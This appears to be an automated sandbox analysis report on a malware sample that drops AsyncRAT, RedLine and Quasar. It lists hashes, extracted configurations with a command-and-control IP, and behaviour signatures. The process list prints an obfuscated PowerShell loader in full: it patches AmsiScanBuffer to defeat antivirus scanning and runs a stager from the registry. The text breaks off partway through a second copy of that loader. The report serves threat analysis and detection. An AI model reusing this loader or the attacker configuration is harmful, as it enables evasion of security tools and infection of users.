Analysis
- max time kernel: 151s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01/11/2022, 10:41

Static task: static1
Behavioral task: behavioral1
- Sample: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Resource: win7-20220812-en
General
- Target: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Size: 584KB
- MD5: 8553f9793539d4d17c13e464d606d7dc
- SHA1: a033d05b0c0a5b220fde15827b5c716fbec3b398
- SHA256: bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
- SHA512: 2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
- SSDEEP: 6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config

Extracted: asyncrat
- Ratatouille 0.1.0
- Youtube
- 179.43.187.19:33
- 179.43.187.19:2525
- 179.43.187.19:4523
- 179.43.187.19:5555
- sdhgamkfgae4-youtube
- delay: 3
- install: true
- install_file: $77-update.exe
- install_folder: %AppData%

Extracted: redline
- cheat
- 179.43.187.19:18875

Extracted: quasar
- 1.4.0
- r77Version
- 179.43.187.19:2326
- d6db683c-9b85-4417-b1a3-4ff8bec1d98b
- encryption_key: 83FE26AAD844F101036726AFCD7F28CF377D20AF
- install_name: $77Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: $77Client
- subdirectory: $77win
Signatures

Quasar payload (4 IoCs)
resource | yara_rule
behavioral2/files/0x001b00000001da04-474.dat | family_quasar
behavioral2/files/0x001b00000001da04-475.dat | family_quasar
behavioral2/files/0x000500000001e828-491.dat | family_quasar
behavioral2/files/0x000500000001e828-493.dat | family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x0003000000000739-349.dat | family_redline
behavioral2/files/0x0003000000000739-352.dat | family_redline

Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
description | pid | Process | procid_target
PID 4780 created 4480 | 4780 | WerFault.exe | 41
PID 4792 created 3340 | 4792 | WerFault.exe | 62

Suspicious use of NtCreateUserProcessOtherParentProcess (5 IoCs)
description | pid | Process | procid_target
PID 4292 created 592 | 4292 | powershell.EXE | 3
PID 2916 created 4480 | 2916 | svchost.exe | 41
PID 2916 created 3340 | 2916 | svchost.exe | 62
PID 1500 created 592 | 1500 | powershell.EXE | 3
PID 1500 created 592 | 1500 | powershell.EXE | 3

Async RAT payload (1 IoC)
resource | yara_rule
behavioral2/memory/3084-139-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat

Looks for VirtualBox Guest Additions in registry (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | $77-update.exe

Executes dropped EXE (8 IoCs)
pid | Process
4320 | $77-update.exe
5012 | $77-update.exe
3808 | $77-update.exe
3180 | qzkzzp.exe
3092 | lsnupy.exe
4288 | sjtjny.exe
4484 | jiyrgq.exe
4880 | $77Client.exe

Looks for VMWare Tools registry key (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | $77-update.exe

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | $77-update.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | $77-update.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | $77-update.exe

Drops startup file (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe | sjtjny.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe | sjtjny.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
48 | api.ipify.org
49 | api.ipify.org

Maps connected drives based on registry (3 TTPs, 4 IoCs)
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | $77-update.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | $77-update.exe

Drops file in System32 directory (12 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\$77Client | svchost.exe
File opened for modification | C:\Windows\system32\$77win | jiyrgq.exe
File opened for modification | C:\Windows\system32\$77win | $77Client.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File created | C:\Windows\system32\$77win\$77Client.exe | jiyrgq.exe
File opened for modification | C:\Windows\system32\$77win\$77Client.exe | jiyrgq.exe
File opened for modification | C:\Windows\system32\$77win\$77Client.exe | $77Client.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE

Suspicious use of SetThreadContext (4 IoCs)
description | pid | Process | procid_target
PID 2328 set thread context of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 4320 set thread context of 3808 | 4320 | $77-update.exe | 98
PID 4292 set thread context of 3356 | 4292 | powershell.EXE | 111
PID 1500 set thread context of 1940 | 1500 | powershell.EXE | 127

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
pid | pid_target | Process | procid_target
3096 | 3340 | WerFault.exe | 62
2168 | 4480 | WerFault.exe | 41
Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg | wmiprvse.exe

Checks processor information in registry (2 TTPs, 18 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe

Creates scheduled task(s) (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1116 | schtasks.exe
832 | schtasks.exe
2164 | schtasks.exe

Delays execution with timeout.exe (1 IoC)
pid | Process
3784 | timeout.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Modifies data under HKEY_USERS (64 IoCs)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Token: SeDebugPrivilege | 4320 | $77-update.exe
Token: SeDebugPrivilege | 3808 | $77-update.exe
Token: SeDebugPrivilege | 3808 | $77-update.exe
Token: SeDebugPrivilege | 1984 | powershell.exe
Token: SeDebugPrivilege | 3456 | powershell.exe
Token: SeDebugPrivilege | 2080 | powershell.exe
Token: SeDebugPrivilege | 1500 | powershell.EXE
Token: SeDebugPrivilege | 4292 | powershell.EXE
Token: SeDebugPrivilege | 4292 | powershell.EXE
Token: SeDebugPrivilege | 3356 | dllhost.exe
Token: SeDebugPrivilege | 4080 | powershell.exe
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeDebugPrivilege | 3092 | lsnupy.exe
Token: SeDebugPrivilege | 3628 | powershell.exe
Token: SeShutdownPrivilege | 3052 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3052 | Explorer.EXE
Token: SeDebugPrivilege | 1500 | powershell.EXE
Token: SeDebugPrivilege | 1940 | dllhost.exe
Token: SeAssignPrimaryTokenPrivilege | 2740 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2740 | svchost.exe
Token: SeSecurityPrivilege | 2740 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2740 | svchost.exe
Token: SeLoadDriverPrivilege | 2740 | svchost.exe
Token: SeSystemtimePrivilege | 2740 | svchost.exe
Token: SeBackupPrivilege | 2740 | svchost.exe
Token: SeRestorePrivilege | 2740 | svchost.exe
Token: SeShutdownPrivilege | 2740 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2740 | svchost.exe
Token: SeUndockPrivilege | 2740 | svchost.exe
Token: SeManageVolumePrivilege | 2740 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 2740 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2740 | svchost.exe
Token: SeSecurityPrivilege | 2740 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2740 | svchost.exe
Token: SeLoadDriverPrivilege | 2740 | svchost.exe
Token: SeSystemtimePrivilege | 2740 | svchost.exe
Token: SeBackupPrivilege | 2740 | svchost.exe
Token: SeRestorePrivilege | 2740 | svchost.exe
Token: SeShutdownPrivilege | 2740 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2740 | svchost.exe
Token: SeUndockPrivilege | 2740 | svchost.exe
Token: SeManageVolumePrivilege | 2740 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 2740 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 2740 | svchost.exe
Token: SeSecurityPrivilege | 2740 | svchost.exe
Token: SeTakeOwnershipPrivilege | 2740 | svchost.exe
Token: SeLoadDriverPrivilege | 2740 | svchost.exe
Token: SeSystemtimePrivilege | 2740 | svchost.exe
Token: SeBackupPrivilege | 2740 | svchost.exe
Token: SeRestorePrivilege | 2740 | svchost.exe
Token: SeShutdownPrivilege | 2740 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 2740 | svchost.exe
Token: SeUndockPrivilege | 2740 | svchost.exe
Token: SeManageVolumePrivilege | 2740 | svchost.exe
Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
3464 | Conhost.exe
1096 | Conhost.exe
4844 | Conhost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 2328 wrote to memory of 3084 | 2328 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89
PID 3084 wrote to memory of 4312 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 90
PID 3084 wrote to memory of 4312 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 90
PID 3084 wrote to memory of 4312 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 90
PID 3084 wrote to memory of 2780 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 92
PID 3084 wrote to memory of 2780 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 92
PID 3084 wrote to memory of 2780 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 92
PID 2780 wrote to memory of 3784 | 2780 | cmd.exe | 94
PID 2780 wrote to memory of 3784 | 2780 | cmd.exe | 94
PID 2780 wrote to memory of 3784 | 2780 | cmd.exe | 94
PID 4312 wrote to memory of 1116 | 4312 | cmd.exe | 95
PID 4312 wrote to memory of 1116 | 4312 | cmd.exe | 95
PID 4312 wrote to memory of 1116 | 4312 | cmd.exe | 95
PID 2780 wrote to memory of 4320 | 2780 | cmd.exe | 96
PID 2780 wrote to memory of 4320 | 2780 | cmd.exe | 96
PID 2780 wrote to memory of 4320 | 2780 | cmd.exe | 96
PID 4320 wrote to memory of 5012 | 4320 | $77-update.exe | 97
PID 4320 wrote to memory of 5012 | 4320 | $77-update.exe | 97
PID 4320 wrote to memory of 5012 | 4320 | $77-update.exe | 97
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 4320 wrote to memory of 3808 | 4320 | $77-update.exe | 98
PID 3808 wrote to memory of 1984 | 3808 | $77-update.exe | 99
PID 3808 wrote to memory of 1984 | 3808 | $77-update.exe | 99
PID 3808 wrote to memory of 1984 | 3808 | $77-update.exe | 99
PID 3808 wrote to memory of 3456 | 3808 | $77-update.exe | 101
PID 3808 wrote to memory of 3456 | 3808 | $77-update.exe | 101
PID 3808 wrote to memory of 3456 | 3808 | $77-update.exe | 101
PID 3808 wrote to memory of 1668 | 3808 | $77-update.exe | 103
PID 3808 wrote to memory of 1668 | 3808 | $77-update.exe | 103
PID 3808 wrote to memory of 1668 | 3808 | $77-update.exe | 103
PID 1668 wrote to memory of 2080 | 1668 | cmd.exe | 105
PID 1668 wrote to memory of 2080 | 1668 | cmd.exe | 105
PID 1668 wrote to memory of 2080 | 1668 | cmd.exe | 105
PID 2080 wrote to memory of 3180 | 2080 | powershell.exe | 106
PID 2080 wrote to memory of 3180 | 2080 | powershell.exe | 106
PID 2080 wrote to memory of 3180 | 2080 | powershell.exe | 106
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 4292 wrote to memory of 3356 | 4292 | powershell.EXE | 111
PID 3356 wrote to memory of 592 | 3356 | dllhost.exe | 3
PID 3356 wrote to memory of 676 | 3356 | dllhost.exe | 1
PID 3356 wrote to memory of 952 | 3356 | dllhost.exe | 23
PID 3356 wrote to memory of 332 | 3356 | dllhost.exe | 11
Processes
- C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
  PID: 676
- C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  PID: 592
  - C:\Windows\system32\dwm.exe
    Command line: "dwm.exe"
    PID: 332
  - C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{a21aff78-d8a4-482d-ad94-3f80eabeb177}
    PID: 3356
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\dllhost.exe
    Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{584339b2-d48e-479b-aedf-d04e62003a81}
    PID: 3616
  - C:\Windows\SysWOW64\dllhost.exe
    Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{584339b2-d48e-479b-aedf-d04e62003a81}
    PID: 1940
    Signatures:
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 524
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  PID: 1140
  Signatures:
  - Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe
    Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID: 2448
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:sWNMGeeqxCew{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FLSGNEYIuzMFhJ,[Parameter(Position=1)][Type]$kiGHAznbqu)$DIOjjNYMmVl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$DIOjjNYMmVl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$FLSGNEYIuzMFhJ).SetImplementationFlags('Runtime,Managed');$DIOjjNYMmVl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$kiGHAznbqu,$FLSGNEYIuzMFhJ).SetImplementationFlags('Runtime,Managed');Write-Output $DIOjjNYMmVl.CreateType();}$xiKjxKMdFrVWi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$xvEURQKfUvRsOZ=$xiKjxKMdFrVWi.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kRdHuFwzpJrbqTITYLq=sWNMGeeqxCew @([String])([IntPtr]);$RlZrSvAWKtMSzptyefdXge=sWNMGeeqxCew @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lYBgMxVEizx=$xiKjxKMdFrVWi.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$iKmSCJLEDdvGrs=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$lYBgMxVEizx,[Object]('Load'+'LibraryA')));$FdiJtVUqegjunzHmZ=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$lYBgMxVEizx,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSsLJd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKmSCJLEDdvGrs,$kRdHuFwzpJrbqTITYLq).Invoke('a'+'m'+'si.dll');$hKEbHYWmtcumGqDHV=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$smSsLJd,[Object]('Ams'+'iSc'+'an'+'Buffer')));$qiYZlAeIto=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdiJtVUqegjunzHmZ,$RlZrSvAWKtMSzptyefdXge).Invoke($hKEbHYWmtcumGqDHV,[uint32]8,4,[ref]$qiYZlAeIto);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$hKEbHYWmtcumGqDHV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdiJtVUqegjunzHmZ,$RlZrSvAWKtMSzptyefdXge).Invoke($hKEbHYWmtcumGqDHV,[uint32]8,0x20,[ref]$qiYZlAeIto);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    PID: 1500
    Signatures:
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 1824
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iMzXCQwJjflk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UAhIvVXBoynSBP,[Parameter(Position=1)][Type]$TcodXjoMtZ)$vjNebDlRByj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$vjNebDlRByj.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$UAhIvVXBoynSBP).SetImplementationFlags('Runtime,Managed');$vjNebDlRByj.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TcodXjoMtZ,$UAhIvVXBoynSBP).SetImplementationFlags('Runtime,Managed');Write-Output $vjNebDlRByj.CreateType();}$SOLEIKFQZXgwM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$MElQLZKbqvseXf=$SOLEIKFQZXgwM.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bZRCETSSixQSxuhIYAS=iMzXCQwJjflk @([String])([IntPtr]);$vYhXwZNtzAbneOwUOxJaqO=iMzXCQwJjflk 